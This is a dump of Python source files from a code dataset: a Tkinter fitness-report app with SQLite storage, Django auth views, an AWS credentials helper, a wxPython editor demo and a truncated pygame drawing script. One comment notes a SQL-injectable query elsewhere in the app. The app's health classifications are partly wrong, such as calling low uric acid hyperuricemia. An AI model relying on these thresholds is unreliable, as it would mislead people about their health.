text=\"RBC Count\").place(x=40, y=50)\r\n\r\n    label_a = Label(top, text=str(fetch7.get())).place(x=90, y=50)\r\n    label_b = Label(top, text=str(RCB_Cal())).place(x=120, y=50)\r\n\r\n\r\ndef BP_Cal():\r\n    a1 = bp_val.get()\r\n    if a1 in range(40, 90):\r\n        return '(Low)'\r\n    elif a1 in range(90, 120):\r\n        return '(Normal)'\r\n    elif a1 in range(120, 140):\r\n        return '(Prehypertension)'\r\n    elif a1 in range(140, 160):\r\n        return '(High: stage 1 hypertension)'\r\n    elif a1 in range(160, 300):\r\n        return '(High: stage 2 hypertension)'\r\n    else:\r\n        return '(Dead)'\r\n\r\n\r\ndef Pulserate_Cal():\r\n    b1 = pulse_rate_val.get()\r\n    if b1 in range(60, 100):\r\n        return '(Normal)'\r\n    elif b1 in range(0, 60):\r\n        return '(Low)'\r\n    elif b1 in range(100, 200):\r\n        return '(High)'\r\n    else:\r\n        return '(Dead)'\r\n\r\n\r\ndef RCB_Cal():\r\n    c1 = rbc_count_val.get()\r\n    if c1 in range(4, 6):\r\n        return '(Normal)'\r\n    elif c1 in range(0, 4):\r\n        return '(Low)'\r\n    elif c1 in range(6, 12):\r\n        return '(High)'\r\n    else:\r\n        return '(Not defined)'\r\n\r\n\r\ndef WBC_cal():\r\n    d1 = wbc_count_val.get()\r\n    if d1 in range(4500, 11000):\r\n        return '(Normal)'\r\n    elif d1 in range(0, 4500):\r\n        return '(Low)'\r\n    elif d1 in range(11000, 20000):\r\n        return '(High)'\r\n    else:\r\n        return '(Not defined)'\r\n\r\n\r\ndef Platelets_cal():\r\n    e1 = platelets_val.get()\r\n    if e1 in range(150000, 450000):\r\n        return '(Normal)'\r\n    elif e1 in range(0, 150000):\r\n        return '(Thrombocytopenia)'\r\n    elif e1 in range(450000, 750000):\r\n        return '(Thrombocytosis)'\r\n    else:\r\n        return '(Not defined)'\r\n\r\n\r\ndef hb_Cal():\r\n    f1 = hb_val.get()\r\n    if f1 in range(14, 18):\r\n        return '(Normal)'\r\n    elif f1 in range(0, 14):\r\n        return '(Low)'\r\n    elif f1 in range(18, 50):\r\n        return '(High)'\r\n    else:\r\n        return '(Not defined)'\r\n\r\n\r\ndef Uricacid_Cal():\r\n    g1 = uric_acid_val.get()\r\n    if g1 in range(3, 6):\r\n        return '(Normal)'\r\n    elif g1 in range(0, 3):\r\n        return '(Asymptomatic hyperuricemia)'\r\n    elif g1 in range(6, 9):\r\n        return '(Hyperuricemia)'\r\n    else:\r\n        return '(Not defined)'\r\n\r\n\r\ndef cholesterol_Cal():\r\n    h1 = cholesterol_val.get()\r\n    if h1 in range(100, 200):\r\n        return '(Normal)'\r\n    elif h1 in range(200, 239):\r\n        return '(Borderline high)'\r\n    elif h1 in range(239, 400):\r\n        return '(High)'\r\n    elif h1 in range(0, 100):\r\n        return 
'(Low)'\r\n    else:\r\n        return '(Not defined)'\r\n\r\n\r\ndef Submission_successful():\r\n    if check_validation():\r\n        save_database()\r\n        messagebox.showinfo(\"Success\", \"Your submission is successful!\")\r\n        # send_mail()\r\n        # messagebox.showinfo(\"Email\", \"Your Report has been mailed!\")\r\n        toplevel()  # Calling the function toplevel()\r\n    else:\r\n        messagebox.showwarning(\"Inputs missing\", \"Kindly fill up all the details!\")\r\n\r\n\r\ndef not_saved():\r\n    response = messagebox.askquestion(\"Alert\", \"Your data will not be saved, still want to exit?\")\r\n    if response == 'yes':\r\n        root.destroy()\r\n\r\n\r\ndef int_validate(inp):\r\n    if inp.isdigit():\r\n        return True\r\n    elif inp == \"\":\r\n        return True\r\n    else:\r\n        return False\r\n\r\n\r\ndef toplevel():\r\n    top = Toplevel()\r\n    top.title(\"Final Report\")\r\n    CenterWindow.center_window(top, 650, 600)\r\n    top.resizable(0, 0)\r\n\r\n    label_top0 = Label(top, text=\"Fitness Report\", width=20, font=('bold', 20))\r\n    label_top0.place(x=170, y=120)\r\n    label_top0.pack()\r\n\r\n    canvas1 = Canvas(top)\r\n    canvas1.pack()\r\n    line1 = canvas1.create_line(10, 3, 400, 3, fill=\"green\")\r\n\r\n    label_top0 = Label(top, text=\"Date : \", width=20, font=myFont3)\r\n    label_top0.place(x=460, y=70)\r\n\r\n    label_top0a = Label(top, text=set_date.get(), font=myFont5).place(x=500, y=90)\r\n\r\n    label_top1 = Label(top, text=\"1. Full Name : \", width=15, font=myFont3, relief=RAISED, bg='turquoise1')\r\n    label_top1.place(x=80, y=130)\r\n\r\n    label_top1a = Label(top, text=full_name.get()).place(x=210, y=130)\r\n\r\n    label_top2 = Label(top, text=\"2. Age : \", width=15, font=myFont3, relief=RAISED, bg='turquoise1')\r\n    label_top2.place(x=340, y=130)\r\n\r\n    label_top2a = Label(top, text=str(age_val.get()) + ' yrs').place(x=470, y=130)\r\n\r\n    label_top3 = Label(top, text=\"3. Weight : \", width=15, font=myFont3, relief=RAISED, bg='turquoise1')\r\n    label_top3.place(x=80, y=160)\r\n\r\n    label_top3a = Label(top, text=str(weight_val.get()) + ' kg').place(x=210, y=160)\r\n\r\n    label_top4 = Label(top, text=\"4. Height : \", width=15, font=myFont3, relief=RAISED, bg='turquoise1')\r\n    label_top4.place(x=340, y=160)\r\n\r\n    label_top4a = Label(top, text=str(height_val.get()) + ' cm').place(x=470, y=160)\r\n\r\n    label_top5 = Label(top, text=\"5. BMI : \", width=15, font=myFont3, relief=RAISED, bg='turquoise1')\r\n    label_top5.place(x=80, y=190)\r\n\r\n    label_top5a = Label(top, text=call_bmi()).place(x=210, y=190)\r\n    label_top5b = Label(top, text=str(BMI_catg())).place(x=240, y=190)\r\n\r\n    label_top6 = Label(top, text=\"6. BP : \", width=15, font=myFont3, relief=RAISED, bg='turquoise1')\r\n    label_top6.place(x=80, y=215)\r\n\r\n    label_top6a = Label(top, text=str(bp_val.get())).place(x=210, y=215)\r\n    label_top6b = Label(top, text=str(BP_Cal())).place(x=240, y=215)\r\n\r\n    label_top7 = Label(top, text=\"7. Pulse Rate : \", width=15, font=myFont3, relief=RAISED, bg='turquoise1')\r\n    label_top7.place(x=80, y=240)\r\n\r\n    label_top7a = Label(top, text=str(pulse_rate_val.get())).place(x=210, y=240)\r\n    label_top7b = Label(top, text=str(Pulserate_Cal())).place(x=240, y=240)\r\n\r\n    label_top8 = Label(top, text=\"8. RBC Count : \", width=15, font=myFont3, relief=RAISED, bg='turquoise1')\r\n    label_top8.place(x=80, y=265)\r\n\r\n    label_top8a = Label(top, text=str(rbc_count_val.get())).place(x=210, y=265)\r\n    label_top8b = Label(top, text=str(RCB_Cal())).place(x=240, y=265)\r\n\r\n    label_top9 = Label(top, text=\"9. 
WBC Count : \", width=15, font=myFont3, relief=RAISED, bg='turquoise1')\r\n label_top9.place(x=80, y=290)\r\n\r\n label_top9a = Label(top, text=str(wbc_count_val.get())).place(x=210, y=290)\r\n label_top9b = Label(top, text=str(WBC_cal())).place(x=240, y=290)\r\n\r\n label_top10 = Label(top, text=\"10. Platelets : \", width=15, font=myFont3, relief=RAISED, bg='turquoise1')\r\n label_top10.place(x=80, y=315)\r\n\r\n label_top10a = Label(top, text=str(platelets_val.get())).place(x=210, y=315)\r\n label_top10b = Label(top, text=str(Platelets_cal())).place(x=240, y=315)\r\n\r\n label_top11 = Label(top, text=\"11. HB : \", width=15, font=myFont3, relief=RAISED, bg='turquoise1')\r\n label_top11.place(x=80, y=340)\r\n\r\n label_top11a = Label(top, text=str(hb_val.get())).place(x=210, y=340)\r\n label_top11b = Label(top, text=str(hb_Cal())).place(x=240, y=340)\r\n\r\n label_top12 = Label(top, text=\"12. Uric Acid : \", width=15, font=myFont3, relief=RAISED, bg='turquoise1')\r\n label_top12.place(x=80, y=365)\r\n\r\n label_top12a = Label(top, text=str(uric_acid_val.get())).place(x=210, y=365)\r\n label_top12b = Label(top, text=str(Uricacid_Cal())).place(x=240, y=365)\r\n\r\n label_top13 = Label(top, text=\"13. Cholesterol : \", width=15, font=myFont3, relief=RAISED, bg='turquoise1')\r\n label_top13.place(x=80, y=390)\r\n\r\n label_top13a = Label(top, text=str(cholesterol_val.get())).place(x=210, y=390)\r\n label_top13b = Label(top, text=str(cholesterol_Cal())).place(x=240, y=390)\r\n\r\n top.mainloop()\r\n\r\n\r\n# def email_validation():\r\n\r\n\r\ndef check_validation():\r\n fullname = full_name.get()\r\n age = age_val.get()\r\n email = set_email.get()\r\n weight = weight_val.get()\r\n height = height_val.get()\r\n BP = bp_val.get()\r\n pulserate = pulse_rate_val.get()\r\n rbccount = rbc_count_val.get()\r\n wbccount = wbc_count_val.get()\r\n platelets = platelets_val.get()\r\n hb = hb_val.get()\r\n uricacid = uric_acid_val.get()\r\n cholestrol = cholesterol_val.get()\r\n report_date = set_date.get()\r\n\r\n gender = var.get()\r\n\r\n if fullname == '':\r\n return False\r\n elif age == '':\r\n return False\r\n elif email == '':\r\n return False\r\n elif weight == '':\r\n return False\r\n elif weight == '':\r\n return False\r\n elif height == '':\r\n return False\r\n elif BP == '':\r\n return False\r\n elif gender != 1 and gender != 2:\r\n return False\r\n elif pulserate == '':\r\n return False\r\n elif rbccount == '':\r\n return False\r\n elif wbccount == '':\r\n return False\r\n elif platelets == '':\r\n return False\r\n elif hb == '':\r\n return False\r\n elif uricacid == '':\r\n return False\r\n elif cholestrol == '':\r\n return False\r\n elif report_date == '':\r\n return False\r\n else:\r\n return True\r\n\r\n\r\ndef save_database():\r\n fullname = full_name.get()\r\n age = age_val.get()\r\n email = set_email.get()\r\n weight = weight_val.get()\r\n height = height_val.get()\r\n BP = bp_val.get()\r\n pulserate = pulse_rate_val.get()\r\n rbccount = rbc_count_val.get()\r\n wbccount = wbc_count_val.get()\r\n platelets = platelets_val.get()\r\n hb = hb_val.get()\r\n uricacid = uric_acid_val.get()\r\n cholestrol = cholesterol_val.get()\r\n report_date = set_date.get()\r\n\r\n con = sqlite3.connect(\"data.db\")\r\n cur = con.cursor()\r\n cur.execute(\r\n \"CREATE TABLE IF NOT EXISTS report(fullname TEXT, age TEXT, email TEXT, weight TEXT, height TEXT, BP TEXT, pulserate TEXT, rbccount TEXT, wbccount TEXT, platelets TEXT, hb TEXT, uricacid TEXT, cholestrol TEXT, report_date TEXT)\")\r\n 
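    # The "?" placeholders in the INSERT below let sqlite3 quote every value
    # itself. By contrast, the string-concatenated SELECT in showdetails()
    # above is open to SQL injection; a safer equivalent would be, for example:
    #   cur.execute("SELECT * FROM report WHERE fullname=? AND email=?",
    #               (name.get(), email.get()))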
cur.execute(\"INSERT INTO report VALUES(?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)\", (\r\n fullname, age, email, weight, height, BP, pulserate, rbccount, wbccount, platelets, hb, uricacid, cholestrol,\r\n report_date))\r\n # print(fullname, age, email, weight, height, BP, pulserate, rbccount, wbccount, platelets, hb, uricacid, cholestrol, report_date)\r\n con.commit()\r\n cur.close()\r\n con.close()\r\n\r\n\r\nroot = Tk()\r\nCenterWindow.center_window(root, 650, 600)\r\nroot.resizable(0, 0)\r\nroot.title(\"Fitness Calculator\")\r\nroot.configure(background=\"powder blue\")\r\n\r\n# Declaration of different font-family\r\nmyFont1 = Font(family=\"Times New Roman\", weight=\"bold\", size=100)\r\nmyFont2 = Font(family=\"Courier\", size=10, weight='bold')\r\nmyFont3 = Font(family=\"Helvetic\", size=10, slant='italic')\r\nmyFont4 = Font(family=\"OpenSymbol\", size=10, slant='italic')\r\nmyFont5 = Font(family=\"OpenSymbol\", size=10, slant='italic', underline=1)\r\n\r\ntop_frame = Frame(root, width=650, height=100, background='gold').place(x=0, y=0)\r\nlabel_0 = Label(top_frame, text=\"Fitness Calculator\", width=20, font=\"Verdana 20 bold\", bg='gold')\r\nlabel_0.place(x=160, y=30)\r\n\r\ncanvas = Canvas(top_frame)\r\ncanvas.place(x=160, y=97)\r\nline1 = canvas.create_line(6, 2, 400, 2, fill=\"green\")\r\n\r\nsecond_frame = Frame(root, width=650, height=500, background=\"powder blue\").place(x=0, y=100)\r\n\r\nlabel_1 = Label(second_frame, text=\"Full Name\", width=20, font=myFont3, bg=\"powder blue\")\r\nlabel_1.place(x=40, y=130)\r\n\r\nfull_name = StringVar() # Variable Used = full_name\r\nentry_1 = Entry(second_frame, bd=3, textvariable=full_name)\r\nentry_1.place(x=170, y=130)\r\nentry_1.focus() # Set the focus/ cursor automatically on the entry box of Full Name\r\n\r\nreg = root.register(int_validate)\r\n\r\nlabel_2 = Label(second_frame, text=\"Age\", width=20, font=myFont3, bg=\"powder blue\")\r\nlabel_2.place(x=320, y=130)\r\n\r\nage_val = IntVar() # Variable Used = age_val\r\nentry_2 = Entry(second_frame, bd=3)\r\nentry_2.place(x=430, y=130)\r\nentry_2.config(validate=\"key\", validatecommand=(reg, '%P'), textvariable=age_val)\r\n\r\nlabel_3a = Label(second_frame, text=\"Email\", width=20, font=myFont2, bg=\"powder blue\")\r\nlabel_3a.place(x=40, y=160)\r\n\r\nset_email = StringVar() # Variable Used = set_email\r\nentry_3a = Entry(second_frame, textvariable=set_email, bd=3)\r\nentry_3a.place(x=170, y=160)\r\nset_email.set(\"@gmail.com\")\r\n\r\nlabel_3b = Label(second_frame, text=\"Date\", width=20, font=myFont2, bg=\"powder blue\")\r\nlabel_3b.place(x=320, y=160)\r\n\r\nset_date = StringVar() # Variable Used = set_date\r\n\r\nentry_3b = Entry(second_frame, textvariable=set_date, bd=3)\r\nset_date.set(datetime.date.today())\r\n\r\nentry_3b.place(x=430, y=160)\r\n\r\nlabel_4 = Label(second_frame, text=\"Gender\", width=20, font=myFont4, bg=\"powder blue\")\r\nlabel_4.place(x=40, y=190)\r\nvar = IntVar() # Variable Used = var(verify it as it is a radiobutton variable)\r\nRadiobutton(second_frame, text=\"Male\", padx=5, variable=var, value=1, font=myFont4, bg=\"powder blue\").place(x=165,\r\n y=190)\r\nRadiobutton(second_frame, text=\"Female\", padx=20, variable=var, value=2, font=myFont4, bg=\"powder blue\").place(x=220,\r\n y=190)\r\n\r\nlabel_4a = Label(second_frame, text=\"Height\", width=20, font=myFont4, bg=\"powder blue\")\r\nlabel_4a.place(x=320, y=190)\r\n\r\nheight_val = IntVar() # Variable Used = height_val\r\nentry_4a = Entry(second_frame, bd=3, 
textvariable=height_val)\r\nentry_4a.place(x=430, y=190)\r\nentry_4a.config(validate=\"key\", validatecommand=(reg, '%P'))\r\n\r\nlabel_5 = Label(second_frame, text=\"Weight\", width=20, font=(\"bold\", 10), bg=\"powder blue\")\r\nlabel_5.place(x=40, y=215)\r\n\r\nweight_val = IntVar() # Variable Used = weight_val\r\nentry_5 = Entry(second_frame, bd=3, textvariable=weight_val)\r\nentry_5.place(x=170, y=215)\r\nentry_5.config(validate=\"key\", validatecommand=(reg, '%P'))\r\n\r\n'''label_6 = Label(root, text=\"Height\", width=20,font=(\"bold\",10))\r\nlabel_6.place(x=40,y=235)\r\n\r\nentry_6 = Entry(root, fg='magenta', bd = 3)\r\nentry_6.place(x=170,y=235)\r\nentry_6.config(validate=\"key\", validatecommand=(reg, '%P'))'''\r\n\r\nlabel_7 = Label(second_frame, text=\"BP\", width=20, font=(\"bold\", 10), bg=\"powder blue\")\r\nlabel_7.place(x=40, y=235)\r\n\r\nbp_val = IntVar() # Variable Used =bp_val\r\nentry_7 = Entry(second_frame, bd=3, textvariable=bp_val)\r\nentry_7.place(x=170, y=235)\r\n\r\nlabel_8 = Label(second_frame, text=\"Pulse Rate\", width=20, font=(\"bold\", 10), bg=\"powder blue\")\r\nlabel_8.place(x=40, y=255)\r\n\r\npulse_rate_val = IntVar() # Variable Used = pulse_rate_val\r\nentry_8 = Entry(second_frame, bd=3, textvariable=pulse_rate_val)\r\nentry_8.place(x=170, y=255)\r\nentry_8.config(validate=\"key\", validatecommand=(reg, '%P'))\r\n\r\nlabel_9 = Label(second_frame, text=\"RBC Count\", width=20, font=(\"bold\", 10), bg=\"powder blue\")\r\nlabel_9.place(x=40, y=275)\r\n\r\nrbc_count_val = IntVar() # Variable Used = rbc_count_val\r\nentry_9 = Entry(second_frame, bd=3, textvariable=rbc_count_val)\r\nentry_9.place(x=170, y=275)\r\nentry_9.config(validate=\"key\", validatecommand=(reg, '%P'))\r\n\r\nlabel_10 = Label(second_frame, text=\"WBC Count\", width=20, font=(\"bold\", 10), bg=\"powder blue\")\r\nlabel_10.place(x=40, y=295)\r\n\r\nwbc_count_val = IntVar() # Variable Used = wbc_count_val\r\nentry_10 = Entry(second_frame, bd=3, textvariable=wbc_count_val)\r\nentry_10.place(x=170, y=295)\r\nentry_10.config(validate=\"key\", validatecommand=(reg, '%P'))\r\n\r\nlabel_11 = Label(second_frame, text=\"Platelets\", width=20, font=(\"bold\", 10), bg=\"powder blue\")\r\nlabel_11.place(x=40, y=315)\r\n\r\nplatelets_val = IntVar() # Variable Used = platelets_val\r\nentry_11 = Entry(second_frame, bd=3, textvariable=platelets_val)\r\nentry_11.place(x=170, y=315)\r\nentry_11.config(validate=\"key\", validatecommand=(reg, '%P'))\r\n\r\nlabel_12 = Label(second_frame, text=\"HB\", width=20, font=(\"bold\", 10), bg=\"powder blue\")\r\nlabel_12.place(x=40, y=335)\r\n\r\nhb_val = IntVar() # Variable Used = hb_val\r\nentry_12 = Entry(second_frame, bd=3, textvariable=hb_val)\r\nentry_12.place(x=170, y=335)\r\nentry_12.config(validate=\"key\", validatecommand=(reg, '%P'))\r\n\r\nlabel_13 = Label(second_frame, text=\"Uric Acid\", width=20, font=(\"bold\", 10), bg=\"powder blue\")\r\nlabel_13.place(x=40, y=355)\r\n\r\nuric_acid_val = IntVar() # Variable Used = uric_acid_val\r\nentry_13 = Entry(second_frame, bd=3, textvariable=uric_acid_val)\r\nentry_13.place(x=170, y=355)\r\nentry_13.config(validate=\"key\", validatecommand=(reg, '%P'))\r\n\r\nlabel_14 = Label(second_frame, text=\"Cholesterol\", width=20, font=(\"bold\", 10), bg=\"powder blue\")\r\nlabel_14.place(x=40, y=375)\r\n\r\ncholesterol_val = IntVar() # Variable Used = cholesterol_val\r\nentry_14 = Entry(second_frame, bd=3, textvariable=cholesterol_val)\r\nentry_14.place(x=170, y=375)\r\nentry_14.config(validate=\"key\", 
validatecommand=(reg, '%P'))\r\n\r\nb = Button(second_frame, text='Generate Report', width=20, height=2, font=\"Verdana 10\", bg='blue', fg='white',\r\n command=Submission_successful).place(x=250, y=450)\r\n\r\n# root.title(\"Exit Button\")\r\nexitButton = Button(second_frame, text=\"Quit\", bg='red', fg='white', width=10, font=\"Verdana 8\", command=not_saved)\r\nexitButton.place(x=520, y=550)\r\n\r\naboutButton = Button(second_frame, text=\"About\", width=13, bg='blue', fg='white', command=about)\r\naboutButton.place(x=280, y=540)\r\n\r\nhistoryButton = Button(second_frame, text=\"History\", width=13, bg='blue', fg='white', command=history)\r\nhistoryButton.place(x=80, y=540)\r\n\r\nroot.mainloop()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":23551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"132311420","text":"from django.contrib.auth import logout as auth_logout\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render\nfrom django.views.decorators.csrf import ensure_csrf_cookie\n\nfrom template.core.serializers import CoreUserSerializer\n\n\n@login_required\n@ensure_csrf_cookie\ndef app_page(request):\n return render(request, 'app.html', dict(\n app_resource='app_main_file',\n initial_state=dict(\n user=CoreUserSerializer(instance=request.user).data\n )\n ))\n\n\n@ensure_csrf_cookie\ndef login_page(request):\n return render(request, 'app.html', dict(\n app_resource='app_login_file',\n initial_state=dict(next=request.GET.get('next', '/'))\n ))\n\n\ndef logout(request):\n auth_logout(request)\n return HttpResponseRedirect('/')\n","sub_path":"src/template/core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"46316269","text":"\n\nfrom xai.brain.wordbase.nouns._rapper import _RAPPER\n\n#calss header\nclass _RAPPERS(_RAPPER, ):\n\tdef __init__(self,): \n\t\t_RAPPER.__init__(self)\n\t\tself.name = \"RAPPERS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"rapper\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_rappers.py","file_name":"_rappers.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"213816675","text":"import hashlib\nfrom . 
import logs, util\nfrom .model_setup import get_model_verbose_level\n\nAWS_KEY = 'access_key'\nAWS_SECRET_KEY = 'secret_access_key'\nKEY_CREDENTIALS = 'credentials'\nAWS_TYPE = 'aws'\n\n# Credentials encapsulates the logic\n# of basic access credentials handling\n# for different kinds of studioml storage providers (S3, http, local etc.)\nclass Credentials(object):\n    def __init__(self, cred_dict):\n        self.logger = logs.getLogger(self.__class__.__name__)\n        self.logger.setLevel(get_model_verbose_level())\n\n        self.type = None\n        self.key = None\n        self.secret_key = None\n        if cred_dict is None:\n            return\n\n        if isinstance(cred_dict, str) and cred_dict == 'none':\n            return\n\n        if not isinstance(cred_dict, dict):\n            msg: str =\\\n                \"NOT SUPPORTED credentials format {0}\".format(repr(cred_dict))\n            util.report_fatal(msg, self.logger)\n\n        if len(cred_dict) == 0:\n            # Empty credentials dictionary is like None:\n            return\n\n        if len(cred_dict) == 1 and AWS_TYPE in cred_dict.keys():\n            aws_creds = cred_dict[AWS_TYPE]\n            self.type = AWS_TYPE\n            self.key = aws_creds.get(AWS_KEY, None)\n            self.secret_key = aws_creds.get(AWS_SECRET_KEY, None)\n            if self.key is None or self.secret_key is None:\n                msg: str = \\\n                    \"INVALID aws credentials format {0}\".format(repr(cred_dict))\n                util.report_fatal(msg, self.logger)\n        else:\n            msg: str =\\\n                \"NOT SUPPORTED credentials format {0}\".format(repr(cred_dict))\n            util.report_fatal(msg, self.logger)\n\n    def get_type(self):\n        return self.type\n\n    def get_key(self):\n        return self.key\n\n    def get_secret_key(self):\n        return self.secret_key\n\n    def to_dict(self):\n        return {\n            self.type: {\n                AWS_KEY: self.key,\n                AWS_SECRET_KEY: self.secret_key\n            }\n        }\n\n    def get_fingerprint(self) -> str:\n        if self.type is None and self.key is None and\\\n                self.secret_key is None:\n            return ''\n        id: str = \"{0}::{1}::{2}\"\\\n            .format(self.type, self.key, self.secret_key)\n        return hashlib.sha256(id.encode()).hexdigest()\n\n    @classmethod\n    def getCredentials(cls, config):\n        if config is None:\n            return None\n        cred_dict = config.get(KEY_CREDENTIALS, None)\n        return Credentials(cred_dict) if cred_dict else None\n\n","sub_path":"studio/credentials.py","file_name":"credentials.py","file_ext":"py","file_size_in_byte":2553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} {"seq_id":"505252768","text":"# coding:utf-8\n'''\nGUI programming (IDLE itself is a Python GUI)\nGUI toolkit modules: Tkinter, Wxpython, Pythonwin, Java swing, pyGTK, Pyqt\nwx GUI scripts use the .pyw file extension\n'''\nimport wx\n\n\nclass ModWx:\n\n    def __init__(self):\n        self.app = wx.App()  # instantiate the wx app; its main loop is a blocking event loop\n\n        self.frame = wx.Frame(None, title='hello', pos=(\n            350, 50), size=(650, 500))  # instantiate the frame\n        '''\n\t\tFrame\n\t\t\tparent, the parent element, identifying the parent window. If parent is None, the widget is top-level.\n\t\t\tid, identifies the widget; no two widgets in one project may share an id, and id=-1 lets wx assign one automatically.\n\t\t\tname, identifies the widget, like id.\n\t\t\ttitle, the text shown at the top of the window.\n\t\t\tpos, the position coordinates, given as a 2-tuple.\n\t\t\tsize, the dimensions, also a 2-tuple.\n\t\t\tstyle, the window style.\n\t\t'''\n        # panel = wx.Panel(frame)  # Panel is a drawing canvas\n        self.panel = self.frame\n\n        self.text1 = wx.TextCtrl(self.panel, value='nihao',\n                                 size=(300, 50), pos=(0, 40))\n        self.text2 = wx.TextCtrl(self.panel, value='hello',\n                                 size=(300, 50), pos=(40, 80))\n        '''\n\t\tTextCtrl text box\n\t\t\tvalue, the text shown in the box.\n\t\t\tvalidator, validation.\n\t\t\tpos\n\t\t\tsize\n\t\t'''\n\n        btn1 = wx.Button(self.panel, label='btn1', size=(20, 10), pos=(80, 0))\n        btn2 = wx.Button(self.panel, label='btn2', size=(20, 10), pos=(80, 20))\n        '''\n\t\tButton\n\t\t\tlabel, the text shown on the button.\n\t\t\tpos\n\t\t\tsize\n\t\t'''\n\n        stext = wx.StaticText(\n            
self.panel, label='this is our example', pos=(0, 50))\n        '''\n\t\tStaticText, a static (read-only) text label\n\t\t'''\n\n        c_box = wx.BoxSizer()\n        '''\n\t\tBoxSizer sizer, of which there are two kinds\n\t\t the default is a horizontal sizer\n\t\t passing wx.VERTICAL makes a vertical sizer\n\t\tsizers can be nested\n\t\t'''\n        # Add appends an element to the given sizer\n        # flag\n        # the first part is the fill style\n        # wx.EXPAND\n        # the second part is the fill direction\n        # wx.ALL, wx.LEFT, wx.RIGHT, wx.BOTTOM, wx.TOP\n        # proportion: the relative proportion\n        # border: the border width\n        c_box.Add(self.text1, proportion=5, flag=wx.EXPAND | wx.ALL, border=5)\n        c_box.Add(self.text2, proportion=2, flag=wx.EXPAND | wx.ALL, border=5)\n        c_box1 = wx.BoxSizer()\n        c_box1.Add(btn1, proportion=1, flag=wx.EXPAND | wx.ALL, border=5)\n        c_box1.Add(btn2, proportion=1, flag=wx.EXPAND | wx.ALL, border=5)\n\n        v_box = wx.BoxSizer(wx.VERTICAL)\n        v_box.Add(c_box, proportion=8, flag=wx.EXPAND | wx.ALL, border=5)\n        v_box.Add(c_box1, proportion=1, flag=wx.EXPAND | wx.ALL, border=5)\n\n        # panel.SetSizer sets the main sizer\n        self.panel.SetSizer(v_box)\n\n        btn1.Bind(wx.EVT_BUTTON, self.opens)\n        btn2.Bind(wx.EVT_BUTTON, self.saves)\n\n        self.panel.Show()  # show the frame\n        self.app.MainLoop()  # start the main loop\n\n    # event handlers bound above; they Set/Get the text values\n    def opens(self, event):\n        f = open(self.text1.GetValue(), 'r')\n        self.text2.SetValue(f.read())\n        f.close()\n\n    def saves(self, event):\n        f = open(self.text1.GetValue(), 'w')\n        f.write(self.text2.GetValue().encode('utf-8'))\n        f.close()\n\nif __name__ == '__main__':\n    ModWx()\n# wx.TE_READONLY makes a TextCtrl read-only\n","sub_path":"PyModules/wx_.pyw","file_name":"wx_.pyw","file_ext":"pyw","file_size_in_byte":3482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} {"seq_id":"497448538","text":"import os\r\nimport pygame\r\nfrom pygame import gfxdraw\r\nimport sys\r\nimport math\r\nfrom OpenGL.GL import * \r\nfrom pygame import OPENGLBLIT\r\nfrom pygame import OPENGL\r\nfrom OpenGL.GLU import *\r\n\r\ndef Round(a):\r\n    return int(a + 0.5)\r\n\r\ndef mainloop():\r\n    while True:\r\n        for event in pygame.event.get(): \r\n            if event.type == pygame.QUIT:\r\n                pygame.quit()\r\n                sys.exit()\r\n\r\ndef Draw():\r\n    FillPoly((300, 300), 6, 100,[255,0,0],algo=\"Bresenham\")\r\n    DrawPoly((300, 300), 6, 100,algo=\"Bresenham\")\r\n    pygame.display.flip()\r\n\r\n\r\n\r\ndef drawDDA(p1, p2, color=[0, 0, 0]):\r\n    x0, y0, x1, y1 = p1[0], p1[1], p2[0], p2[1]\r\n    steps = abs(x0-x1) if abs(x0-x1) > abs(y0-y1) else abs(y0-y1)\r\n    dx = (x1-x0)/steps\r\n    dy = (y1-y0)/steps\r\n    x, y = x0, y0\r\n    gfxdraw.pixel(screen,Round(x),Round(y),color)\r\n    for i in range(int(steps)):\r\n        x += dx\r\n        y += dy\r\n        gfxdraw.pixel(screen,Round(x), Round(y),color)\r\n\r\n\r\ndef drawBresenham(p1, p2, color=[0, 0, 0]):\r\n    l = []\r\n    x0, y0, x1, y1 = int(p1[0]), int(p1[1]), int(p2[0]), int(p2[1])\r\n    dx = x1 - x0\r\n    dy = y1 - y0\r\n    xsign = 1 if dx > 0 else -1\r\n    ysign = 1 if dy > 0 else -1\r\n    dx = abs(dx)\r\n    dy = abs(dy)\r\n    if dx > dy:\r\n        xx, xy, yx, yy = xsign, 0, 0, ysign\r\n    else:\r\n        dx, dy = dy, dx\r\n        xx, xy, yx, yy = 0, ysign, xsign, 0\r\n    D = 2*dy - dx\r\n    y = 0\r\n    for x in range(dx + 1):\r\n        l.append((x0 + x*xx + y*yx, y0 + x*xy + y*yy))\r\n        gfxdraw.pixel(screen,x0 + x*xx + y*yx, y0 + x*xy + y*yy,color)\r\n        if D >= 0:\r\n            y += 1\r\n            D -= 2*dx\r\n        D += 2*dy\r\n\r\n\r\ndef DrawPoly(center, n, s, color=[0, 0, 0],algo=\"DDA\"):\r\n    x0, y0 = center[0], center[1]\r\n    a = math.radians(360 / n)\r\n    d = s / 2 / math.sin(a / 2)\r\n    pts = []\r\n    bv1x = x0-s/2\r\n    bv1y = y0 - (s/2)*(1/math.tan(math.radians(180/n)))\r\n    bv2x = x0+s/2\r\n    bv2y = bv1y\r\n    for i in range(n+1):\r\n        sideAngle = math.radians((360 * i / n))\r\n        x = (bv1x-x0)*math.cos(sideAngle) + (bv1y-y0) * 
